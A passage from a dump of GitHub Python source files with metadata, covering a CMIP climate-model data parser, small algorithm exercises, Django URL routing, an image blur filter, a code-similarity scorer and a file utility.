re.compile('^r\\d{1,2}i\\d{1,2}p\\d{1,3}')\n tabId = '.'.join([modId[6], modId[5]])\n varId = None # solr scrape was 'tos'\n gridId = None\n verTest = re.compile('^v\\d{1,8}')\n elif 'CMIP3' in mipEra:\n actId = 'CMIP'\n instId = modId[1]\n # Kludge for wrong instId\n if instId in 'CSIRO-QCCCE':\n instId = 'CSIRO'\n srcId = modId[2]\n # validate srcId\n expId = modId[3]\n # Kludge actId from expId\n expTest = re.compile('^sres[a-b]\\d')\n if expTest.match(expId):\n actId = 'ScenarioMIP'\n ripfId = modId[6]\n ripfTest = re.compile('^run\\d{1}')\n tabId = '.'.join([modId[5], modId[4]])\n varId = modId[7]\n gridId = None\n verTest = re.compile('^v\\d{1}')\n pass\n # Get generics and validate\n verId = modId[-1]\n nodeId = docId[1]\n # Remap institutions to CMIP6\n instId = instRemap(instId)\n # Print for testing\n # print('mipEra:', mipEra)\n # print('actId:', actId)\n # print('instId:', instId)\n # print('srcId:', srcId)\n # print('expId:', expId)\n # print('ripfId:', ripfId)\n # print('tabId:', tabId)\n # print('varId:', varId)\n # print('gridId:', gridId)\n # print('verId:', verId)\n # print('nodeId:', nodeId)\n # pdb.set_trace()\n # validate ripfId\n if not ripfTest.match(ripfId):\n print('** ripfId format invalid - ripfTest: ', ripfId,\n ', exiting.. **')\n sys.exit()\n # validate verId\n if not verTest.match(verId):\n print('** verId format invalid - verTest: ', verId,\n ', exiting.. **')\n sys.exit()\n\n return mipEra, actId, instId, srcId, expId, ripfId, tabId, varId, gridId,\\\n verId, nodeId\n\n\ndef instRemap(instId):\n \"\"\"\n\n Parameters\n ----------\n instId : TYPE\n DESCRIPTION.\n\n Returns\n -------\n instId : TYPE\n DESCRIPTION.\n\n \"\"\"\n # Create CMIP6 alias for earlier mipEras\n if instId in ['CAS', 'IAP', 'LASG-CESS', 'LASG-IAP']:\n instId = 'CAS'\n if instId in ['CMCC', 'INGV']:\n instId = 'CMCC'\n if instId in ['CRNM_CERFACS', 'CNRM-CERFACS']:\n instId = 'CNRM-CERFACS'\n if instId in ['CSIRO', 'CSIRO-BOM']:\n instId = 'CSIRO'\n if instId in ['EC-Earth-Consortium', 'ICHEC']:\n instId = 'EC-Earth-Consortium'\n if instId in ['FIO-QLNM', 'FIO']:\n instId = 'FIO-QLNM'\n if instId in ['NCAR', 'NSF-DOE-NCAR']:\n instId = 'NCAR'\n if instId in ['NCC', 'BCCR']:\n instId = 'NCC'\n if instId in ['NIMS-KMA', 'NIMR-KMA']:\n instId = 'NIMS-KMA'\n if instId in ['NOAA-GFDL', 'GFDL']:\n instId = 'NOAA-GFDL'\n\n return instId\n\n\n'''\nhttps://github.com/WCRP-CMIP/CMIP6_CVs/blob/master/CMIP6_institution_id.json 210506 1231\n\"AER\":\"Research and Climate Group, Atmospheric and Environmental Research, 131 Hartwell Avenue, Lexington, MA 02421, USA\",\n\"AS-RCEC\":\"Research Center for Environmental Changes, Academia Sinica, Nankang, Taipei 11529, Taiwan\",\n\"AWI\":\"Alfred Wegener Institute, Helmholtz Centre for Polar and Marine Research, Am Handelshafen 12, 27570 Bremerhaven, Germany\",\n\"BCC\":\"Beijing Climate Center, Beijing 100081, China\",\n\"BNU\":\"Beijing Normal University, Beijing 100875, China\",\n\"CAMS\":\"Chinese Academy of Meteorological Sciences, Beijing 100081, China\",\n\"CAS\":\"Chinese Academy of Sciences, Beijing 100029, China\",\n\"CCCR-IITM\":\"Centre for Climate Change Research, Indian Institute of Tropical Meteorology Pune, Maharashtra 411 008, India\",\n\"CCCma\":\"Canadian Centre for Climate Modelling and Analysis, Environment and Climate Change Canada, Victoria, BC V8P 5C2, Canada\",\n\"CMCC\":\"Fondazione Centro Euro-Mediterraneo sui Cambiamenti Climatici, Lecce 73100, Italy\",\n\"CNRM-CERFACS\":\"CNRM (Centre National de Recherches Meteorologiques, Toulouse 31057, France), CERFACS (Centre Europeen de Recherche et de Formation Avancee en Calcul Scientifique, Toulouse 31057, France)\",\n\"CSIR-Wits-CSIRO\":\"CSIR (Council for Scientific and Industrial Research - Natural Resources and the Environment, Pretoria, 0001, South Africa), Wits (University of the Witwatersrand - Global Change Institute, Johannesburg 2050, South Africa), CSIRO (Commonwealth Scientific and Industrial Research Organisation, Aspendale, Victoria 3195, Australia)Mailing address: Wits, Global Change Institute, Johannesburg 2050, South Africa\",\n\"CSIRO\":\"Commonwealth Scientific and Industrial Research Organisation, Aspendale, Victoria 3195, Australia\",\n\"CSIRO-ARCCSS\":\"CSIRO (Commonwealth Scientific and Industrial Research Organisation, Aspendale, Victoria 3195, Australia), ARCCSS (Australian Research Council Centre of Excellence for Climate System Science). Mailing address: CSIRO, c/o Simon J. Marsland, 107-121 Station Street, Aspendale, Victoria 3195, Australia\",\n\"CSIRO-COSIMA\":\"CSIRO (Commonwealth Scientific and Industrial Research Organisation, Australia), COSIMA (Consortium for Ocean-Sea Ice Modelling in Australia). Mailing address: CSIRO, c/o Simon J. Marsland, 107-121 Station Street, Aspendale, Victoria 3195, Australia\",\n\"DKRZ\":\"Deutsches Klimarechenzentrum, Hamburg 20146, Germany\",\n\"DWD\":\"Deutscher Wetterdienst, Offenbach am Main 63067, Germany\",\n\"E3SM-Project\":\"LLNL (Lawrence Livermore National Laboratory, Livermore, CA 94550, USA); ANL (Argonne National Laboratory, Argonne, IL 60439, USA); BNL (Brookhaven National Laboratory, Upton, NY 11973, USA); LANL (Los Alamos National Laboratory, Los Alamos, NM 87545, USA); LBNL (Lawrence Berkeley National Laboratory, Berkeley, CA 94720, USA); ORNL (Oak Ridge National Laboratory, Oak Ridge, TN 37831, USA); PNNL (Pacific Northwest National Laboratory, Richland, WA 99352, USA); SNL (Sandia National Laboratories, Albuquerque, NM 87185, USA). Mailing address: LLNL Climate Program, c/o David C. Bader, Principal Investigator, L-103, 7000 East Avenue, Livermore, CA 94550, USA\",\n\"EC-Earth-Consortium\":\"AEMET, Spain; BSC, Spain; CNR-ISAC, Italy; DMI, Denmark; ENEA, Italy; FMI, Finland; Geomar, Germany; ICHEC, Ireland; ICTP, Italy; IDL, Portugal; IMAU, The Netherlands; IPMA, Portugal; KIT, Karlsruhe, Germany; KNMI, The Netherlands; Lund University, Sweden; Met Eireann, Ireland; NLeSC, The Netherlands; NTNU, Norway; Oxford University, UK; surfSARA, The Netherlands; SMHI, Sweden; Stockholm University, Sweden; Unite ASTR, Belgium; University College Dublin, Ireland; University of Bergen, Norway; University of Copenhagen, Denmark; University of Helsinki, Finland; University of Santiago de Compostela, Spain; Uppsala University, Sweden; Utrecht University, The Netherlands; Vrije Universiteit Amsterdam, the Netherlands; Wageningen University, The Netherlands. Mailing address: EC-Earth consortium, Rossby Center, Swedish Meteorological and Hydrological Institute/SMHI, SE-601 76 Norrkoping, Sweden\",\n\"ECMWF\":\"European Centre for Medium-Range Weather Forecasts, Reading RG2 9AX, UK\",\n\"FIO-QLNM\":\"FIO (First Institute of Oceanography, Ministry of Natural Resources, Qingdao 266061, China), QNLM (Qingdao National Laboratory for Marine Science and Technology, Qingdao 266237, China)\",\n\"HAMMOZ-Consortium\":\"ETH Zurich, Switzerland; Max Planck Institut fur Meteorologie, Germany; Forschungszentrum Julich, Germany; University of Oxford, UK; Finnish Meteorological Institute, Finland; Leibniz Institute for Tropospheric Research, Germany; Center for Climate Systems Modeling (C2SM) at ETH Zurich, Switzerland\",\n\"INM\":\"Institute for Numerical Mathematics, Russian Academy of Science, Moscow 119991, Russia\",\n\"INPE\":\"National Institute for Space Research, Cachoeira Paulista, SP 12630-000, Brazil\",\n\"IPSL\":\"Institut Pierre Simon Laplace, Paris 75252, France\",\n\"KIOST\":\"Korea Institute of Ocean Science and Technology, Busan 49111, Republic of Korea\",\n\"LLNL\":\"Lawrence Livermore National Laboratory, Livermore, CA 94550, USA. Mailing address: LLNL Climate Program, c/o Stephen A. Klein, Principal Investigator, L-103, 7000 East Avenue, Livermore, CA 94550, USA\",\n\"MESSy-Consortium\":\"The Modular Earth Submodel System (MESSy) Consortium, represented by the Institute for Physics of the Atmosphere, Deutsches Zentrum fur Luft- und Raumfahrt (DLR), Wessling, Bavaria 82234, Germany\",\n\"MIROC\":\"JAMSTEC (Japan Agency for Marine-Earth Science and Technology, Kanagawa 236-0001, Japan), AORI (Atmosphere and Ocean Research Institute, The University of Tokyo, Chiba 277-8564, Japan), NIES (National Institute for Environmental Studies, Ibaraki 305-8506, Japan), and R-CCS (RIKEN Center for Computational Science, Hyogo 650-0047, Japan)\",\n\"MOHC\":\"Met Office Hadley Centre, Fitzroy Road, Exeter, Devon, EX1 3PB, UK\",\n\"MPI-M\":\"Max Planck Institute for Meteorology, Hamburg 20146, Germany\",\n\"MRI\":\"Meteorological Research Institute, Tsukuba, Ibaraki 305-0052, Japan\",\n\"NASA-GISS\":\"Goddard Institute for Space Studies, New York, NY 10025, USA\",\n\"NASA-GSFC\":\"NASA Goddard Space Flight Center, Greenbelt, MD 20771, USA\",\n\"NCAR\":\"National Center for Atmospheric Research, Climate and Global Dynamics Laboratory, 1850 Table Mesa Drive, Boulder, CO 80305, USA\",\n\"NCC\":\"NorESM Climate modeling Consortium consisting of CICERO (Center for International Climate and Environmental Research, Oslo 0349), MET-Norway (Norwegian Meteorological Institute, Oslo 0313), NERSC (Nansen Environmental and Remote Sensing Center, Bergen 5006), NILU (Norwegian Institute for Air Research, Kjeller 2027), UiB (University of Bergen, Bergen 5007), UiO (University of Oslo, Oslo 0313) and UNI (Uni Research, Bergen 5008), Norway. Mailing address: NCC, c/o MET-Norway, Henrik Mohns plass 1, Oslo 0313, Norway\",\n\"NERC\":\"Natural Environment Research Council, STFC-RAL, Harwell, Oxford, OX11 0QX, UK\",\n\"NIMS-KMA\":\"National Institute of Meteorological Sciences/Korea Meteorological Administration, Climate Research Division, Seoho-bukro 33, Seogwipo-si, Jejudo 63568, Republic of Korea\",\n\"NIWA\":\"National Institute of Water and Atmospheric Research, Hataitai, Wellington 6021, New Zealand\",\n\"NOAA-GFDL\":\"National Oceanic and Atmospheric Administration, Geophysical Fluid Dynamics Laboratory, Princeton, NJ 08540, USA\",\n\"NTU\":\"National Taiwan University, Taipei 10650, Taiwan\",\n\"NUIST\":\"Nanjing University of Information Science and Technology, Nanjing, 210044, China\",\n\"PCMDI\":\"Program for Climate Model Diagnosis and Intercomparison, Lawrence Livermore National Laboratory, Livermore, CA 94550, USA\",\n\"PNNL-WACCEM\":\"PNNL (Pacific Northwest National Laboratory), Richland, WA 99352, USA\",\n\"RTE-RRTMGP-Consortium\":\"AER (Atmospheric and Environmental Research, Lexington, MA 02421, USA); UColorado (University of Colorado, Boulder, CO 80309, USA). Mailing address: AER c/o Eli Mlawer, 131 Hartwell Avenue, Lexington, MA 02421, USA\",\n\"RUBISCO\":\"ORNL (Oak Ridge National Laboratory, Oak Ridge, TN 37831, USA); ANL (Argonne National Laboratory, Argonne, IL 60439, USA); BNL (Brookhaven National Laboratory, Upton, NY 11973, USA); LANL (Los Alamos National Laboratory, Los Alamos, NM 87545); LBNL (Lawrence Berkeley National Laboratory, Berkeley, CA 94720, USA); NAU (Northern Arizona University, Flagstaff, AZ 86011, USA); NCAR (National Center for Atmospheric Research, Boulder, CO 80305, USA); UCI (University of California Irvine, Irvine, CA 92697, USA); UM (University of Michigan, Ann Arbor, MI 48109, USA). Mailing address: ORNL Climate Change Science Institute, c/o Forrest M. Hoffman, Laboratory Research Manager, Building 4500N Room F106, 1 Bethel Valley Road, Oak Ridge, TN 37831-6301, USA\",\n\"SNU\":\"Seoul National University, Seoul 08826, Republic of Korea\",\n\"THU\":\"Department of Earth System Science, Tsinghua University, Beijing 100084, China\",\n\"UA\":\"Department of Geosciences, University of Arizona, Tucson, AZ 85721, USA\",\n\"UCI\":\"Department of Earth System Science, University of California Irvine, Irvine, CA 92697, USA\",\n\"UHH\":\"Universitat Hamburg, Hamburg 20148, Germany\",\n\"UTAS\":\"Institute for Marine and Antarctic Studies, University of Tasmania, Hobart, Tasmania 7001, Australia\",\n\"UofT\":\"Department of Physics, University of Toronto, 60 St George Street, Toronto, ON M5S1A7, Canada\"\n'''\n\n# %% Build list of models per MIP\n# Get time\ntimeFormatDir = datetime.datetime.now().strftime('%y%m%d')\n# List input files\nfileList = os.listdir(os.path.join('..', timeFormatDir))\nfileList.sort()\nprint('fileList:', fileList)\n\n# %% Build dictionary keying off source_id\nmips = {}\nmips['CMIP6'] = {}\nmips['CMIP5'] = {}\nmips['CMIP3'] = {}\n\nqueries = {'modId': 'ocean model id (+ version)',\n 'eos': 'equation of state (+ constants)',\n 'cp': 'specific heat capacity (cpocean, J kg-1 K-1)',\n 'refRho': 'reference density (boussinesq; rhozero, kg m-3)',\n 'frzEqn': 'freezing point (equation)',\n 'angRot': 'planet angular rotation (radians s-1)',\n 'graAcc': 'gravitational acceleration (m s-2)',\n 'horRes': 'native horizontal resolution',\n 'verRes': 'native vertical resolution',\n 'vertK': 'vertical diffusivity scheme',\n 'mldSch': 'boundary-layer (mixed-) scheme',\n 'vol': 'sea water volume',\n 'initCl': 'initialization observed climatology',\n 'spinYr': 'spinup length (years)',\n 'antAer': 'anthropogenic aerosol forcing',\n 'volcFo': 'volcanic forcing',\n 'aerInd': 'sulphate aerosol indirect effects',\n 'geotHt': 'geothermal heating'}\n\nfor count1, filePath in enumerate(fileList):\n if filePath in ['.DS_Store', 'ESGF.json']:\n continue\n print('count1', count1, 'filePath:', filePath)\n fullPath = os.path.join('..', timeFormatDir, filePath)\n print('fullPath:', fullPath)\n with open(fullPath) as jsonFile:\n a = json.load(jsonFile)\n print('a.keys():', a.keys())\n print('a[''response''].keys():', a['response'].keys())\n # Use source_id indexes to build out tree\n for count2, tmp in enumerate(a['response']['docs']):\n print('count2:', count2, 'id:', tmp['id'])\n [mipEra, actId, instId, srcId, expId, ripfId, tabId, varId,\n gridId, verId, nodeId] = siftBits(tmp['id'])\n print('mipEra:', mipEra)\n print('actId:', actId)\n print('instId:', instId)\n print('srcId:', srcId)\n print('expId:', expId)\n print('ripfId:', ripfId)\n print('tabId:', tabId)\n print('varId:', varId)\n print('gridId:', gridId)\n print('verId:', verId)\n print('nodeId:', nodeId)\n # Build json\n if instId not in mips[mipEra].keys():\n mips[mipEra][instId] = {}\n if srcId not in mips[mipEra][instId].keys():\n mips[mipEra][instId][srcId] = {}\n if actId not in mips[mipEra][instId][srcId].keys():\n mips[mipEra][instId][srcId][actId] = {}\n if expId not in mips[mipEra][instId][srcId][actId].keys():\n mips[mipEra][instId][srcId][actId][expId] = {}\n if ripfId not in mips[mipEra][instId][srcId][actId][expId].keys():\n mips[mipEra][instId][srcId][actId][expId][ripfId] = {}\n for count3, query in enumerate(queries.keys()):\n print(count3, query)\n mips[mipEra][instId][srcId][actId][expId][ripfId][queries[\n query]] = None\n print(fullPath)\n print('----------')\n print('----------')\n time.sleep(3)\n\n# Process mipEra result\noutFile = os.path.join('..', 'CMIP_ESGF.json')\nprint('outFile:', outFile)\nwith open(outFile, 'w', encoding='utf-8') as outJson:\n json.dump(mips, outJson, ensure_ascii=False, indent=4, sort_keys=True)\n\n# %% Build webpages per mipEra\n","repo_name":"durack1/CMIPOcean","sub_path":"src/readOceanMods.py","file_name":"readOceanMods.py","file_ext":"py","file_size_in_byte":22613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71308765725","text":"class NodeList:\n def __init__(self, val=None, _next=None):\n self._val = val\n self.next = _next\n\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n res = NodeList(None)\n\n node = res\n while l1 and l2:\n if l1.val < l2.val:\n node.next, l1 = l1, l1.next\n else:\n node.next, l2 = l2, l2.next\n node = node.next\n\n if l1:\n node.next = l1\n else:\n node.next = l2\n\n return res.next\n\n\n\n\n\n","repo_name":"buxuele/algo_snippet","sub_path":"junk/21_03_try_myself.py","file_name":"21_03_try_myself.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1272380429","text":"from django.urls import path, include\n\nfrom .views import *\n\napp_name = \"business\"\n\nbusiness_day_patterns = ([\n path('create/', businessday_create, name='create'),\n path('/profile/', business_profile, name='profile'),\n path('/edit/', BusinessDayEdit.as_view(), name='edit'),\n path('/delete/', BusinessDayDel.as_view(), name='delete'),\n ], 'businessday')\n\nadmin_patterns = ([\n path('calendar/', business_calendar, name='calendar'),\n path('calendar/data/', get_calendar_data_admin, name='data'),\n ], 'admin')\n\nfrontend_patterns = ([\n path('calendar/data/', get_calendar_data_frontend, name='data'),\n ], 'frontend')\n\nutils_patterns = ([\n path('//get/hours/', businessday_get_hours, name='hours'),\n path('///check/', check_businessday, name='check')\n ], 'utils')\n\nurlpatterns = [\n path('businessday/', include(business_day_patterns)),\n path('admin/', include(admin_patterns)),\n path('frontend/', include(frontend_patterns)),\n path('utils/', include(utils_patterns)),\n]\n","repo_name":"alexiuasse/Gerenciamento-de-Salao-Beleza","sub_path":"app/business/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"8435740081","text":"\"\"\"\nDecrypt String from Alphabet to Integer Mapping (Easy)\n\nGiven a string s formed by digits ('0' - '9') and '#' . We want to map s to English lowercase characters as follows:\n\nCharacters ('a' to 'i') are represented by ('1' to '9') respectively.\nCharacters ('j' to 'z') are represented by ('10#' to '26#') respectively. \nReturn the string formed after mapping.\n\nIt's guaranteed that a unique mapping will always exist.\n\n \n\nExample 1:\n\nInput: s = \"10#11#12\"\nOutput: \"jkab\"\nExplanation: \"j\" -> \"10#\" , \"k\" -> \"11#\" , \"a\" -> \"1\" , \"b\" -> \"2\".\nExample 2:\n\nInput: s = \"1326#\"\nOutput: \"acz\"\nExample 3:\n\nInput: s = \"25#\"\nOutput: \"y\"\nExample 4:\n\nInput: s = \"12345678910#11#12#13#14#15#16#17#18#19#20#21#22#23#24#25#26#\"\nOutput: \"abcdefghijklmnopqrstuvwxyz\"\n \n\nConstraints:\n\n1 <= s.length <= 1000\ns[i] only contains digits letters ('0'-'9') and '#' letter.\ns will be valid string such that mapping is always possible.\n\"\"\"\n\n\"\"\"\nfunction that converts digits to characters\nKNOWN LIMITATIONS - solution can be optimized\n\"\"\"\ndef freqAlphabets(s):\n if (type(s) != str):\n return \"Invalid Input\"\n decrypted_string = \"\"\n last_hash_pos = 0\n for i in range(len(s)):\n #if we get to a #, convert all digits from last # pos until you get to the two digits\n # right before the #\n #Then concatenate the two digits and convert to the respective character\n if (s[i] == '#'):\n for x in range(last_hash_pos, (i-2)):\n decrypted_string += chr(int(s[x])+96)\n decrypted_string += chr(int(s[i-2:i])+ 96)\n last_hash_pos = i+1\n elif (not s[i].isdigit()):\n return \"Invalid Input\"\n else:\n continue\n #after going through the string, convert any digits after the last # pos to characters\n if (last_hash_pos-1 != len(s)):\n for i in range(last_hash_pos, len(s)):\n decrypted_string += chr(int(s[i])+96)\n return decrypted_string\n\n\"\"\"\nfunction that declares and initializes strings to be tested\n\"\"\"\ndef test_freqAlphabets():\n #initialize input strings. for testing purposes, i have created multiple valid and invalid tuples.\n # the input string is in index 0 and the expected output is in index 1\n test_num = 0\n empty_string = (\"\",\"\")\n non_int_string = (\"abcd\",\"Invalid Input\")\n single_char_invalid = ('k', \"Invalid Input\")\n simple_invalid_string = (\"12.345\", \"Invalid Input\")\n mixed_invalid_string = (\"1*2c4?.d\", \"Invalid Input\")\n simple_string = (\"12345\", \"abcde\")\n one_letter_string = (\"9\", \"i\")\n double_digit_letter = (\"25#\", \"y\")\n simple_string_2 = (\"10#11#12\", \"jkab\")\n long_string = (\"12345678910#11#12#13#14#15#16#17#18#19#20#21#22#23#24#25#26#\", \"abcdefghijklmnopqrstuvwxyz\")\n\n for test_list in (empty_string,\n non_int_string,\n single_char_invalid,\n simple_invalid_string,\n mixed_invalid_string,\n simple_string,\n one_letter_string,\n double_digit_letter,\n simple_string_2,\n long_string):\n test_num+=1\n print (\"================ Test \", test_num, \" ================\")\n print (\"Input: \", test_list[0])\n print (\"Expected: \", test_list[1])\n print (\"Output: \", freqAlphabets(test_list[0]))\n if (test_list[1] == freqAlphabets(test_list[0])):\n print (\"PASS\")\n else:\n print (\"FAIL\")\n\nif __name__ == '__main__': \n test_freqAlphabets()","repo_name":"kabirolatinwo/programming-challenges","sub_path":"decryptString.py","file_name":"decryptString.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"22519711267","text":"qualifications = (2, 4, 6, 8)\n\ndef content(items, index):\n try:\n result = items[index]\n except:\n result = None\n\n return result\n\ndef length(items):\n index = 0\n while content(items, index) != None:\n index = index + 1\n\n return index\n\nsum = 0\n\nfor index in range(0, length(qualifications)):\n sum = sum + qualifications[index]\n\nmedia = sum / length(qualifications)\n\nprint(\"Number of items:\", length(qualifications))\nprint(\"Final qualification........\", sum)\nprint(\"Media........\", media)\n","repo_name":"marinavicenteartiaga/KeepCodingModernProgrammingWithPython","sub_path":"module0/e6.py","file_name":"e6.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33484896395","text":"ctemps = [-40, 0, 37, 75, 100]\n\nfor celsius in ctemps:\n fahrenheit = ((9 * celsius) / 5) + 32\n # f\"...{VARIABLE}....{VARIABLE:FMT}...\"\"\n print(f\"{celsius:5.1f} C is {fahrenheit:5.1f} F\")\n\nfruits = [\n ' MANGO', 'Apple', ' peach ', 'PLUM ', ' Apricot',\n 'BaNaNa', 'Persimmon '\n]\n\nclean_fruits = [f.strip().lower() for f in fruits]\nprint(f\"clean_fruits: {clean_fruits}\")\n\nclean_fruits = []\nfor bbq in fruits:\n # f = fruits[0]\n # f = fruits[1]\n # f = fruits[2]\n # ...\n # f = fruits[6]\n value = bbq.strip().lower()\n clean_fruits.append(value)\n\n","repo_name":"jstrickler/20230501boot","sub_path":"sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71542478364","text":"from typing import Tuple\n\nimport torch\nimport torch.nn as nn\n\nimport kornia\nfrom kornia.filters.kernels import get_box_kernel2d\nfrom kornia.filters.kernels import normalize_kernel2d\n\n\nclass BoxBlur(nn.Module):\n r\"\"\"Blurs an image using the box filter.\n\n The function smooths an image using the kernel:\n\n .. math::\n K = \\frac{1}{\\text{kernel_size}_x * \\text{kernel_size}_y}\n \\begin{bmatrix}\n 1 & 1 & 1 & \\cdots & 1 & 1 \\\\\n 1 & 1 & 1 & \\cdots & 1 & 1 \\\\\n \\vdots & \\vdots & \\vdots & \\ddots & \\vdots & \\vdots \\\\\n 1 & 1 & 1 & \\cdots & 1 & 1 \\\\\n \\end{bmatrix}\n\n Args:\n kernel_size (Tuple[int, int]): the blurring kernel size.\n border_type (str): the padding mode to be applied before convolving.\n The expected modes are: ``'constant'``, ``'reflect'``,\n ``'replicate'`` or ``'circular'``. Default: ``'reflect'``.\n normalized (bool): if True, L1 norm of the kernel is set to 1.\n\n Returns:\n torch.Tensor: the blurred input tensor.\n\n Shape:\n - Input: :math:`(B, C, H, W)`\n - Output: :math:`(B, C, H, W)`\n\n Example:\n >>> input = torch.rand(2, 4, 5, 7)\n >>> blur = kornia.filters.BoxBlur((3, 3))\n >>> output = blur(input) # 2x4x5x7\n \"\"\"\n\n def __init__(self, kernel_size: Tuple[int, int],\n border_type: str = 'reflect',\n normalized: bool = True) -> None:\n super(BoxBlur, self).__init__()\n self.kernel_size: Tuple[int, int] = kernel_size\n self.border_type: str = border_type\n self.kernel: torch.Tensor = get_box_kernel2d(kernel_size)\n self.normalized: bool = normalized\n if self.normalized:\n self.kernel = normalize_kernel2d(self.kernel)\n\n def __repr__(self) -> str:\n return self.__class__.__name__ +\\\n '(kernel_size=' + str(self.kernel_size) + ', ' +\\\n 'normalized=' + str(self.normalized) + ', ' + \\\n 'border_type=' + self.border_type + ')'\n\n def forward(self, input: torch.Tensor): # type: ignore\n return kornia.filter2D(input, self.kernel, self.border_type)\n\n\n# functiona api\n\n\ndef box_blur(input: torch.Tensor,\n kernel_size: Tuple[int, int],\n border_type: str = 'reflect',\n normalized: bool = True) -> torch.Tensor:\n r\"\"\"Blurs an image using the box filter.\n\n See :class:`~kornia.filters.BoxBlur` for details.\n \"\"\"\n return BoxBlur(kernel_size, border_type, normalized)(input)\n","repo_name":"BingyaoHuang/DeProCams","sub_path":"src/python/kornia/filters/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"86"} +{"seq_id":"23330619721","text":"s = list(input())\r\nans = []\r\nfor i in range(1,len(s)-1):\r\n for j in range(i + 1,len(s)):\r\n first = s[ : i]\r\n second = s[i : j]\r\n third = s[j : ]\r\n first.reverse()\r\n second.reverse()\r\n third.reverse()\r\n tmp = first + second + third\r\n ans.append(''.join(tmp))\r\nans.sort()\r\nprint(ans[0])\r\n\r\n\r\n","repo_name":"juhyun-99/Baekjoon_algorithm","sub_path":"백준/Silver/1251. 단어 나누기/단어 나누기.py","file_name":"단어 나누기.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21287823021","text":"import os\nimport re\nimport itertools \nimport comparator\nimport json\nimport math\n\n\nREGEX = re.compile('.*[.](c|cpp|java)$')\ndef is_cppsrc(srcname):\n return (REGEX.match(srcname) != None)\n\n\ndef get_result(test_dir):\n TEST_dir=test_dir\n print('preprocessing...')\n\n srcnames = filter(is_cppsrc,os.listdir(test_dir))\n\n seq_name_pairs = map(lambda srcname: \n (comparator.get_sequence_from(test_dir + srcname), srcname), srcnames[:])\n\n print('computing match scores of all pairs...')\n scores = []\n\n name_map=dict()\n count =0\n\n mother_score=dict()\n error_dna=[]\n\n nodes_array=[]\n seq_name_pairs2=[]\n\n re_lang=dict()\n\n re_lang[\"NofCode\"]=len(seq_name_pairs)\n\n NofC=0\n NofCPP=0\n NofJAVA=0\n NofPY=0\n Nofelse=0\n\n mtc_N=0\n mtc=\"\"\n\n for i in seq_name_pairs:\n token_count=i[0].count('#');\n\n if mtc_N < token_count :\n mtc=i[1]\n mtc_N=token_count\n\n if token_count < 35 :\n error_dna.append(i[1])\n continue\n\n str1=i[0]\n mother_score[i[1]]=comparator.match_score_local(str1,str1)\n\n ext=i[1].split('.')\n ext=ext[1]\n\n print (ext)\n\n if ext == \"c\" :\n NofC+=1\n elif ext == \"cpp\" :\n NofCPP+=1\n elif ext == \"java\" :\n NofJAVA+=1\n elif ext == \"py\" :\n NofPY+=1\n else :\n Nofelse+=1\n\n\n\n name_map[i[1]]=i[1]\n re_node={\"name\":name_map[i[1]]}\n nodes_array.append(re_node)\n seq_name_pairs2.append(i)\n\n re_lang[\"NofC\"]=NofC\n re_lang[\"NofCPP\"]=NofCPP\n re_lang[\"NofJAVA\"]=NofJAVA\n re_lang[\"NofPY\"]=NofPY\n\n for pair in itertools.combinations(seq_name_pairs2,2):\n (a,b) = pair\n str1=a[0]\n str2=b[0]\n\n\n str1=re.sub('#ID','',a[0])\n str2=re.sub('#ID','',b[0])\n \n score1=float(comparator.match_score_local(str1,str2))/float(mother_score[a[1]])\n score1=score1*100\n score2=float(comparator.match_score_local(str2,str1))/float(mother_score[b[1]])\n score2=score2*100\n score=max(score1,score2)\n\n if score >20.0:\n score=format(score,\".4f\")\n scores.append((score,a,b))\n\n scores.sort(reverse=True)\n\n result_st=[]\n result=dict()\n links_array=[]\n links_array2=[]\n count=1;\n for tup in scores:\n (score,a,b) = tup\n name_a = a[1]\n name_b = b[1]\n\n str_score=str(score)\n str_score=str_score[:5]\n\n \n\n len_a = a[0].count('#')\n len_b = b[0].count('#')\n re_link={\"source\":name_map[name_a],\"target\":name_map[name_b],\"weight\":str_score}\n links_array.append(re_link)\n result_st.append(re_score(count,name_a,len_a,name_b,len_b,score) )\n\n re_link2={\"number\":count,\"file1\":name_map[name_a],\"len1\":len_a, \"file2\":name_map[name_b],\"len2\":len_b, \"score\":str_score}\n links_array2.append(re_link2)\n\n count=count+1 \n\n result[\"nodes\"]=nodes_array\n result[\"links\"]=links_array\n\n with open('example.json','w') as make_file:\n json.dump(result,make_file,indent=2)\n\n\n print('plotting result.')\n return (links_array2, json.dumps(result,indent=2), error_dna, re_lang ,TEST_dir, mtc, mtc_N)\n\n\nclass re_score:\n def __init__(self,number ,file1, len1, file2, len2, score):\n self.number=number\n self.file1=file1\n self.len1=len1\n self.file2=file2\n self.len2=len2\n self.score=score\n","repo_name":"hanseonghye/Detective-HAN-E","sub_path":"else/makeGraph/pla.py","file_name":"pla.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32215073821","text":"import os\r\nfrom pathlib import Path\r\n\r\n\r\n## Private methods\r\ndef _pathExists(filePath):\r\n\treturn os.path.exists(filePath)\r\n\r\ndef _ppError(msg):\r\n\tstar_length = 13 + len(msg) #13 represents length of hard-coded Error decoration\r\n\tprint(\"*\" * star_length)\r\n\tprint(\"** Error: %s **\" % msg)\r\n\tprint(\"*\" * star_length)\r\n\r\n\r\n## Public methods\r\ndef makeDirectory(filePath):\r\n\ttry:\r\n\t\tif not _pathExists(filePath):\r\n\t\t\tos.makedirs(filePath)\r\n\t\telse:\r\n\t\t\tmsg = \"Directory already 